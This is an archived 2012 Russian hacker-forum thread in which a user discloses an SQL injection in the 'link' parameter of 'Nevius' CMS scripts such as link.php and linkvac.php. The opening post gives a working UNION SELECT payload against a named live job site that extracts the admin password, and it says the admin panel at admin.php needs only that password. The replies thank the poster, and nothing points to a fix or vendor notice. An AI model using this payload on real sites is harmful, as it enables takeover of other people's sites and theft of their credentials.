Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

Уязвимость в движках "Nevius"

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> Уязвимость в движках "Nevius"
Имя
Сообщение << Старые топики   Новые топики >>
Уязвимость в движках "Nevius" - 2012-05-06 14:12:28.100000   
GothX

Сообщений: 263
Оценки: 20
Присоединился: 2011-06-22 13:27:08.173333
 Достаточно давно мною обнаружена уязвимость в скриптах движка "Nevius".
Данный движок в основном используется на сайтах интим-услуг, но также и на job-сайтах, и на многих других. Полный список можно посмотреть на сайте самого движка:
http://nevius.ru/
Уязвимы PHP-скрипты "link.php" (на сайтах интим-услуг), "linkvac.php" (на job-сайтах), и т.д. Уязвимый параметр во всех скриптах имеет название "link".
Пример эксплуатации уязвимости:
http://jobgorod.ru/linkvac.php?link=24810+union+select+1,pass,3+from+adminip– (в данном случае результат запроса выводится в заголовке страницы).
Админка, как правило, находится по адресу:
http://site.ru/admin.php
и для входа требуется только пароль.
Post #: 1
RE: Уязвимость в движках "Nevius" - 2012-05-06 22:51:57.563333   
Brz

Сообщений: 2024
Оценки: 0
Присоединился: 2010-09-19 12:17:29.423333
 Спасибо. Пригодится!
Post #: 2
RE: Уязвимость в движках "Nevius" - 2012-05-07 18:24:44.080000   
LeGoLaZZZ

Сообщений: 741
Оценки: 202
Присоединился: 2011-06-05 19:53:53.613333
 Спасибо+
Post #: 3
Страниц:  [1]
Все форумы >> [В Сети] >> Уязвимость в движках "Nevius"







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.